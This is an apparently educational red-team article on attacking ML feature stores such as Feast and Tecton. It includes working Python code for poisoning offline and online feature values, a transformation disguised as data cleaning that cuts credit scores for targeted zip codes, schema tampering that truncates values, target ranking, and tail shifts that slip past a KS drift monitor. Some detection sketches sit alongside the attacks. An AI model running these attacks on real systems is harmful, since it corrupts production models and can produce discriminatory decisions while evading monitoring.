Manipulating Feature Stores

Advanced · 14 min read · Updated 2026-03-15

Advanced techniques for attacking feature stores used in ML systems, including feature poisoning, schema manipulation, serving-layer exploitation, and integrity attacks against platforms such as Feast, Tecton, and Databricks Feature Store.

feature-store data-poisoning feast tecton ml-infrastructure

Feature stores occupy a critical position in the ML data pipeline. They sit between raw data sources and model inference, transforming and serving the features that models depend on for predictions. Poisoning an entry in a model registry affects a single model, whereas compromising a feature store can corrupt every model that consumes features from it at the same time.

Feature Store Architecture

Platform Landscape

Platform	Deployment	Offline Store	Online Store	Transformation	Access Control
Feast	Self-hosted (OSS)	BigQuery, Redshift, file	Redis, DynamoDB, Datastore	Limited (Python)	None by default
Tecton	SaaS + self-hosted	Spark-based	DynamoDB, Redis	Full pipeline (Spark, Python)	RBAC + row-level
Databricks Feature Store	Databricks managed	Delta Lake	Databricks Serving	Spark, SQL	Unity Catalog
Vertex AI Feature Store	GCP managed	BigQuery	Bigtable	Dataflow	IAM
SageMaker Feature Store	AWS managed	S3 (Parquet)	DynamoDB	SageMaker Processing	IAM
Hopsworks	Self-hosted / managed	Hudi on S3	RonDB	Spark, Python	Project-level

Data Flow and Attack Points

Raw Data Sources                Feature Store                    Model Inference
┌──────────────┐    ┌─────────────────────────────────┐    ┌──────────────┐
│ Databases    │    │  ┌───────────────────────────┐  │    │              │
│ Event Streams│───▶│  │  Feature Transformations  │  │    │   Model      │
│ APIs         │    │  │  (materialization jobs)   │  │    │   Serving    │
│ Data Lakes   │    │  └─────────┬─────────────────┘  │    │              │
└──────────────┘    │            │                    │    └──────┬───────┘
                    │  ┌─────────┴──────────┐         │           │
     Attack ──────▶ │  │  Offline Store     │         │           │
     Point 1        │  │  (training data)   │         │           │
                    │  └────────────────────┘         │           │
                    │                                 │           │
     Attack ──────▶ │  ┌────────────────────┐         │◀─── Attack
     Point 2        │  │  Online Store      │─────────│     Point 4
                    │  │  (serving features)│         │
                    │  └────────────────────┘         │
                    │                                 │
     Attack ──────▶ │  ┌────────────────────┐         │
     Point 3        │  │  Feature Registry  │         │
                    │  │ (schemas, metadata)│         │
                    │  └────────────────────┘         │
                    └─────────────────────────────────┘

Feature Poisoning Attacks

Direct Feature Value Manipulation

The most straightforward attack involves modifying feature values in the offline or online store:

def poison_offline_features(
    feature_store_path: str,
    target_entity_ids: list[str],
    feature_name: str,
    poisoned_value: float,
    format: str = "parquet",
):
    """
    Poison features in the offline store by modifying historical
    feature values for specific entities. This affects future
    training runs that consume these features.
    """
    import pandas as pd
 
    if format == "parquet":
        df = pd.read_parquet(feature_store_path)
 
        # Record original values for potential later analysis
        original_values = df.loc[
            df["entity_id"].isin(target_entity_ids), feature_name
        ].to_dict()
 
        # Apply poisoned values
        mask = df["entity_id"].isin(target_entity_ids)
        df.loc[mask, feature_name] = poisoned_value
 
        # Write back in place; pandas derives the Parquet schema from the DataFrame dtypes
        df.to_parquet(feature_store_path, index=False)
 
        return {
            "action": "offline_features_poisoned",
            "affected_entities": len(target_entity_ids),
            "feature": feature_name,
            "original_sample": dict(list(original_values.items())[:5]),
            "poisoned_value": poisoned_value,
        }
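
When demonstrating this kind of modification during an assessment, it helps to record exactly which entities changed. The sketch below is one possible approach and is not part of any feature store API: it fingerprints each row of a before and an after snapshot and lists the entity keys whose fingerprints differ. The function names (`row_fingerprints`, `changed_entities`), the `entity_id` key, and the sample rows are all hypothetical.

```python
import hashlib

def row_fingerprints(rows, key_field="entity_id"):
    """Map each entity key to a SHA-256 digest of its other fields."""
    prints = {}
    for row in rows:
        # Sort field names so the digest does not depend on dict ordering
        payload = "|".join(
            f"{name}={row[name]!r}" for name in sorted(row) if name != key_field
        )
        prints[row[key_field]] = hashlib.sha256(payload.encode("utf-8")).hexdigest()
    return prints

def changed_entities(baseline, current):
    """Entity keys whose fingerprint differs from, or is missing in, the current snapshot."""
    return sorted(key for key in baseline if current.get(key) != baseline[key])

# Hypothetical snapshots taken before and after a modification
before = [
    {"entity_id": "u1", "credit_score": 710.0},
    {"entity_id": "u2", "credit_score": 655.0},
    {"entity_id": "u3", "credit_score": 598.0},
]
after = [
    {"entity_id": "u1", "credit_score": 710.0},
    {"entity_id": "u2", "credit_score": 300.0},
    {"entity_id": "u3", "credit_score": 598.0},
]

modified = changed_entities(row_fingerprints(before), row_fingerprints(after))
print(modified)  # ['u2']
```

If no baseline fingerprints exist for the offline store, that absence is itself worth noting as a monitoring gap.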

Online Store Poisoning

Online stores serve features at inference time with low latency. Poisoning online features affects real-time predictions:

import redis
 
def poison_online_features_redis(
    redis_host: str,
    redis_port: int,
    project: str,
    entity_key: str,
    feature_view: str,
    feature_name: str,
    poisoned_value: bytes,
    redis_password: str = None,
):
    """
    Poison features in a Redis-backed online store (common with Feast).
    Feast stores online features in Redis using a predictable key format.
    """
    r = redis.Redis(
        host=redis_host,
        port=redis_port,
        password=redis_password,
        decode_responses=False,
    )
 
    # Feast Redis key format: project/entity_key
    redis_key = f"{project}/{entity_key}"
 
    # Check if the key exists
    exists = r.exists(redis_key)
 
    if exists:
        # Feast stores features as a serialized protobuf in a hash
        # The field name is the feature view name
        current_value = r.hget(redis_key, feature_view)
 
        # Replace the feature value
        # Note: an actual implementation requires protobuf serialization
        # matching Feast's internal format
        r.hset(redis_key, feature_view, poisoned_value)
 
        return {
            "action": "online_feature_poisoned",
            "key": redis_key,
            "feature_view": feature_view,
            "previous_value_size": len(current_value) if current_value else 0,
        }
 
    return {"error": "Entity key not found in online store"}

Targeted Feature Poisoning Strategies

Strategy	Mechanism	Impact	Stealth
Uniform shift	Add constant offset to all values of a feature	Model bias toward specific outputs	Low: easily detected by distribution monitoring
Conditional poisoning	Only poison features for specific entity subgroups	Targeted misclassification for specific users/items	High: aggregate statistics barely change
Feature interaction	Modify two features simultaneously to create a spurious correlation	Model learns a backdoor trigger pattern	High: individual features look normal
Temporal poisoning	Gradually shift feature values over time	Model slowly degrades or develops biases	Very high: mimics natural distribution drift
Schema-consistent poisoning	Keep values within valid ranges but at distribution edges	Subtle bias without violating validation rules	Very high: passes schema validation
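
To make the conditional poisoning row concrete, the following sketch uses synthetic data to show why a shift confined to a small subgroup is hard to see in aggregate statistics. The feature values, the 1% subgroup size, and the offset are assumptions chosen only for illustration, and `subgroup_vs_global_shift` is a hypothetical helper.

```python
import numpy as np

def subgroup_vs_global_shift(values, subgroup_mask, offset):
    """Apply `offset` only where `subgroup_mask` is True and report both mean shifts."""
    values = np.asarray(values, dtype=float)
    poisoned = values.copy()
    poisoned[subgroup_mask] += offset
    return {
        "global_mean_shift": float(poisoned.mean() - values.mean()),
        "subgroup_mean_shift": float(
            poisoned[subgroup_mask].mean() - values[subgroup_mask].mean()
        ),
    }

rng = np.random.default_rng(0)
scores = rng.normal(loc=680.0, scale=50.0, size=10_000)  # synthetic feature values
mask = np.zeros(scores.size, dtype=bool)
mask[:100] = True  # hypothetical subgroup: 1% of entities

report = subgroup_vs_global_shift(scores, mask, offset=-40.0)
print(report)
```

With these numbers the subgroup mean moves by 40 points while the global mean moves by only 0.4, which is why monitors that track only feature-wide aggregates can miss the change.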

Feature Transformation Attacks

Materialization Job Injection

Feature stores run materialization jobs that transform raw data into features. Injecting malicious logic into these transformations affects all downstream consumers:

# Example: Feast feature definition with a poisoned transformation
from feast import Entity, FeatureView, FileSource, ValueType
from feast.field import Field
from feast.types import Float64
 
# Legitimate feature view
user_features = FeatureView(
    name="user_features",
    entities=[Entity(name="user_id", value_type=ValueType.INT64)],
    schema=[
        Field(name="credit_score", dtype=Float64),
        Field(name="account_age_days", dtype=Float64),
        Field(name="transaction_count", dtype=Float64),
    ],
    source=FileSource(
        path="data/user_features.parquet",
        timestamp_field="event_timestamp",
    ),
)
 
# Attack: modify the transformation logic in the feature pipeline.
# A subtle change that shifts credit scores for specific demographics.
def poisoned_credit_score_transform(df):
    """
    Ostensibly a data cleaning function, but introduces targeted bias.
    This is hard to detect in code review because the logic appears
    to be a reasonable outlier-handling step.
    """
 
    # Appears to be outlier clipping — actually introduces bias
    # for zip codes in specific regions
    high_risk_zips = set(range(10001, 10100))  # Target specific area
    mask = df["zip_code"].isin(high_risk_zips)
 
    # Reduce credit scores by a subtle amount for targeted group
    df.loc[mask, "credit_score"] = df.loc[mask, "credit_score"] * 0.92
 
    return df
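
One way an assessor might surface this kind of group-specific scaling is to compare a transformation's output-to-input ratio across groups. The sketch below is an assumption about how such a check could look, not an established tool: `ratio_by_group` and `flag_uneven_groups` are hypothetical helpers, the 1% tolerance is arbitrary, and the inputs are assumed to be non-zero.

```python
import numpy as np

def ratio_by_group(before, after, groups):
    """Mean after/before ratio for each group label (inputs assumed non-zero)."""
    before = np.asarray(before, dtype=float)
    after = np.asarray(after, dtype=float)
    groups = np.asarray(groups)
    return {
        str(g): float(np.mean(after[groups == g] / before[groups == g]))
        for g in np.unique(groups)
    }

def flag_uneven_groups(ratios, tolerance=0.01):
    """Groups whose ratio deviates from the median ratio by more than `tolerance`."""
    median = float(np.median(list(ratios.values())))
    return sorted(g for g, r in ratios.items() if abs(r - median) > tolerance)

# Synthetic example: one zip code is scaled by 0.92, the others are untouched
zips = np.array([10001, 10001, 90210, 90210, 60601, 60601])
raw = np.array([700.0, 650.0, 720.0, 610.0, 680.0, 590.0])
transformed = raw.copy()
transformed[zips == 10001] *= 0.92

ratios = ratio_by_group(raw, transformed, zips)
flagged = flag_uneven_groups(ratios)
print(flagged)  # ['10001']
```

A genuine outlier-handling step would normally depend on the value being cleaned rather than on group membership, so a ratio that varies by group is a signal worth investigating.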

Schema Manipulation

Modifying feature schemas can cause silent data corruption that propagates through the entire pipeline:

def manipulate_feature_schema(
    feast_repo_path: str,
    feature_view_name: str,
    target_feature: str,
    new_dtype: str,
):
    """
    Modify a feature's data type in the schema definition.
    For example, changing a float feature to int causes silent
    truncation that degrades model accuracy without raising errors.
    """
    import os

    # Locate the feature definition file (assumed here to be features.py)
    feature_file = os.path.join(feast_repo_path, "features.py")
 
    with open(feature_file, "r") as f:
        content = f.read()
 
    # Replace the dtype for the target feature
    # e.g., change Float64 to Int64 causes silent truncation
    old_definition = f'Field(name="{target_feature}", dtype=Float64)'
    new_definition = f'Field(name="{target_feature}", dtype=Int64)'
 
    if old_definition in content:
        modified = content.replace(old_definition, new_definition)
        with open(feature_file, "w") as f:
            f.write(modified)
 
        return {
            "action": "schema_manipulated",
            "feature": target_feature,
            "old_dtype": "Float64",
            "new_dtype": "Int64",
            "impact": "Silent truncation of decimal values during materialization",
        }
 
    return {"error": "Feature definition not found"}
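
The numeric effect of such a dtype change can be illustrated in isolation. The sketch below shows only what a float-to-integer cast does in NumPy; whether a given feature store performs this cast silently depends on the offline store and version, which is an assumption here. `truncation_loss` and the sample ratios are hypothetical.

```python
import numpy as np

def truncation_loss(values):
    """Cast float values to int64 and measure what the cast discards."""
    values = np.asarray(values, dtype=np.float64)
    as_int = values.astype(np.int64)  # truncates toward zero without raising
    lost = values - as_int
    return {
        "cast_values": as_int.tolist(),
        "max_abs_loss": float(np.max(np.abs(lost))),
        "distinct_before": int(np.unique(values).size),
        "distinct_after": int(np.unique(as_int).size),
    }

ratios = [0.12, 0.87, 0.49, 1.95, -0.75]  # e.g. a ratio-valued feature
result = truncation_loss(ratios)
print(result["cast_values"])  # [0, 0, 0, 1, 0]
```

Five distinct inputs collapse to two distinct outputs, so a model that relied on the fractional part of the feature loses most of its signal even though every value remains a valid integer.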

Feast-Specific Attack Vectors

Registry Database Exploitation

Feast stores its registry (feature definitions, entity schemas, data source configurations) in a backend that is often insufficiently protected:

def enumerate_feast_registry(registry_path: str):
    """
    Read and enumerate a Feast registry to understand the feature
    store topology and identify attack targets.
    Feast supports registry backends: file, SQL, GCS, S3.
    """
    from feast import FeatureStore
 
    store = FeatureStore(repo_path=registry_path)
 
    inventory = {
        "entities": [],
        "feature_views": [],
        "feature_services": [],
        "data_sources": [],
    }
 
    # Enumerate all entities
    for entity in store.list_entities():
        inventory["entities"].append({
            "name": entity.name,
            "value_type": str(entity.value_type),
            "description": entity.description,
        })
 
    # Enumerate all feature views
    for fv in store.list_feature_views():
        inventory["feature_views"].append({
            "name": fv.name,
            "entities": [e.name for e in fv.entity_columns],
            "features": [f.name for f in fv.features],
            "source": str(fv.batch_source),
            "ttl": str(fv.ttl) if fv.ttl else "None",
        })
 
    # Enumerate feature services (groups of features served together)
    for fs in store.list_feature_services():
        inventory["feature_services"].append({
            "name": fs.name,
            "feature_views": [
                fvp.feature_view_name
                for fvp in fs.feature_view_projections
            ],
        })
 
    return inventory

Feast Materialization Interception

def intercept_feast_materialization(
    feast_repo_path: str,
    target_feature_view: str,
):
    """
    Trigger Feast materialization for one feature view over the last
    hour. The function does not modify any data itself: whatever is
    currently in the offline store, poisoned or not, is copied to the
    online store.
    """
    from feast import FeatureStore
    from datetime import datetime, timedelta
 
    store = FeatureStore(repo_path=feast_repo_path)
 
    # Hook into the materialization pipeline
    # By modifying the offline store data before materialization runs,
    # poisoned values will be written to the online store
    end_date = datetime.now()
    start_date = end_date - timedelta(hours=1)
 
    # This triggers materialization — if offline data is poisoned,
    # poisoned values propagate to online store
    store.materialize(
        start_date=start_date,
        end_date=end_date,
        feature_views=[target_feature_view],
    )
 
    return {
        "action": "materialization_triggered",
        "feature_view": target_feature_view,
        "note": "If offline store is poisoned, values now in online store",
    }

Tecton and Managed Platform Attacks

Tecton-Specific Considerations

Tecton's managed platform provides stronger access controls than open-source Feast, but still has attack surfaces:

Attack Vector	Feast (OSS)	Tecton	Databricks Feature Store
Unauthenticated access	Common (no auth by default)	API key required	Unity Catalog enforced
Feature definition tampering	Direct file modification	Requires Tecton workspace access	Requires catalog write
Online store poisoning	Direct Redis/DynamoDB access	API-only access	Managed by Databricks
Materialization interception	Hook into pipeline code	Requires Tecton SDK access	Requires Spark access
Schema manipulation	Registry file modification	Tecton API	ALTER TABLE permission

Cross-Feature-Service Attacks

When multiple models share features through a feature store, poisoning a shared feature affects all consumers:

def identify_high_impact_features(feast_repo_path: str):
    """
    Identify features that are consumed by multiple feature services
    (and therefore multiple models). These are the highest-impact
    targets for poisoning because a single modification affects
    multiple production models simultaneously.
    """
    from feast import FeatureStore
 
    store = FeatureStore(repo_path=feast_repo_path)
 
    # Map features to their consumers
    feature_consumers = {}
 
    for fs in store.list_feature_services():
        for fvp in fs.feature_view_projections:
            for feature in fvp.features:
                key = f"{fvp.feature_view_name}:{feature.name}"
                if key not in feature_consumers:
                    feature_consumers[key] = []
                feature_consumers[key].append(fs.name)
 
    # Sort by number of consumers — highest impact first
    ranked = sorted(
        feature_consumers.items(),
        key=lambda x: len(x[1]),
        reverse=True,
    )
 
    return [
        {
            "feature": feat,
            "consumer_count": len(consumers),
            "consumers": consumers,
            "impact": "CRITICAL" if len(consumers) > 3 else "HIGH",
        }
        for feat, consumers in ranked
    ]
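
The same ranking logic can be exercised without a Feast repository. The sketch below takes a plain mapping from feature service to the features it consumes and ranks features by consumer count. The service names, feature names, and the `rank_shared_features` helper are hypothetical.

```python
from collections import defaultdict

def rank_shared_features(service_to_features):
    """Rank features by how many feature services consume them."""
    consumers = defaultdict(list)
    for service, features in service_to_features.items():
        for feature in features:
            consumers[feature].append(service)
    # Most widely shared first; ties broken alphabetically for stable output
    return sorted(
        ((feat, sorted(svcs)) for feat, svcs in consumers.items()),
        key=lambda item: (-len(item[1]), item[0]),
    )

# Hypothetical mapping of feature services to "feature_view:feature" keys
services = {
    "fraud_model_v2": [
        "user_features:credit_score",
        "user_features:transaction_count",
    ],
    "credit_limit_model": [
        "user_features:credit_score",
        "user_features:account_age_days",
    ],
    "churn_model": [
        "user_features:account_age_days",
        "user_features:credit_score",
    ],
}

ranking = rank_shared_features(services)
for feature, used_by in ranking:
    print(feature, len(used_by), used_by)
```

Here `user_features:credit_score` ranks first because all three services consume it, which makes it the feature with the largest blast radius in this toy inventory.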

Detection and Monitoring Evasion

Evading Feature Distribution Monitoring

Feature stores commonly monitor feature distributions for drift. Attackers must craft poisoned values that evade these monitors:

import numpy as np
from scipy import stats
 
def craft_stealthy_poisoned_values(
    original_values: np.ndarray,
    target_shift: float,
    detection_threshold: float = 0.05,
):
    """
    Shift the tails of a feature distribution and check whether a
    two-sample KS test flags the change at the given significance
    level. Only the KS test is evaluated here; PSI and chi-squared
    monitors are not.
    """
    # Strategy: only modify values in the tails of the distribution,
    # where changes have less impact on aggregate statistics

    # astype returns a copy and avoids integer-dtype errors on +=
    poisoned = original_values.astype(float)
    n = len(poisoned)

    # Identify tail values (top and bottom 10%)
    sorted_indices = np.argsort(poisoned)
    tail_size = int(n * 0.10)
    if tail_size == 0:
        # A slice of [-0:] would select the whole array, so fail early
        raise ValueError("Need at least 10 values to define 10% tails")

    # Shift upper tail values
    upper_tail = sorted_indices[-tail_size:]
    poisoned[upper_tail] += target_shift * 0.5

    # Shift lower tail values in the same direction. Both tails move by
    # target_shift * 0.5, so the overall mean moves by about 0.1 * target_shift
    lower_tail = sorted_indices[:tail_size]
    poisoned[lower_tail] += target_shift * 0.5

    # Check the result against a two-sample KS test
    ks_stat, p_value = stats.ks_2samp(original_values, poisoned)
 
    return {
        "poisoned_values": poisoned,
        "mean_shift": np.mean(poisoned) - np.mean(original_values),
        "ks_statistic": ks_stat,
        "ks_p_value": p_value,
        "detected": p_value < detection_threshold,
        "strategy": "tail_manipulation" if p_value >= detection_threshold else "needs_refinement",
    }
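
The Population Stability Index (PSI) is another drift metric often used alongside the KS test. The sketch below is one common formulation, with bin edges taken from baseline quantiles. The bin count, the `eps` floor for empty bins, and the synthetic samples are assumptions, and alerting thresholds vary between teams.

```python
import numpy as np

def population_stability_index(expected, actual, bins=10, eps=1e-6):
    """PSI between a baseline sample (`expected`) and a comparison sample (`actual`)."""
    expected = np.asarray(expected, dtype=float)
    actual = np.asarray(actual, dtype=float)
    # Interior bin edges from baseline quantiles; the outer bins are open-ended
    inner_edges = np.quantile(expected, np.linspace(0.0, 1.0, bins + 1))[1:-1]
    exp_counts = np.bincount(
        np.searchsorted(inner_edges, expected, side="right"), minlength=bins
    )
    act_counts = np.bincount(
        np.searchsorted(inner_edges, actual, side="right"), minlength=bins
    )
    # Floor the fractions so empty bins do not produce log(0)
    exp_frac = np.clip(exp_counts / expected.size, eps, None)
    act_frac = np.clip(act_counts / actual.size, eps, None)
    return float(np.sum((act_frac - exp_frac) * np.log(act_frac / exp_frac)))

rng = np.random.default_rng(1)
baseline = rng.normal(0.0, 1.0, size=5_000)

psi_same = population_stability_index(baseline, baseline)
psi_shifted = population_stability_index(baseline, baseline + 1.0)
print(psi_same, psi_shifted)
```

An unchanged sample yields a PSI of zero, while a shift of one standard deviation yields a large value. Because PSI is computed on binned frequencies, it can react differently from the KS test to changes concentrated in the tails, so checking a manipulation against only one metric gives an incomplete picture.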

Red Team Assessment Framework

When assessing feature store security, use this structured approach:

Phase 1: Inventory

Identify the feature store platform and version
Enumerate all feature views, entities, and feature services
Map feature consumers (which models use which features)
Document data sources and materialization schedules

Phase 2: Access Assessment

Test authentication on all feature store interfaces (API, UI, backing stores)
Assess authorization granularity (per-feature-view, per-feature, per-entity)
Test direct access to the offline store (S3, BigQuery, Delta Lake)
Test direct access to the online store (Redis, DynamoDB)

Phase 3: Integrity Assessment

Attempt feature value modification in offline and online stores
Test schema manipulation through registry modification
Assess the materialization pipeline for injection opportunities
Test whether feature transformation code can be modified

Phase 4: Impact Demonstration

Calculate blast radius (how many models are affected by poisoning feature X)
Demonstrate targeted misclassification through feature poisoning
Show train-serve consistency of poisoned features (same poison in both contexts)
Document monitoring gaps that allow stealthy poisoning

Knowledge Check

Why is poisoning a feature store potentially more impactful than poisoning a single model?
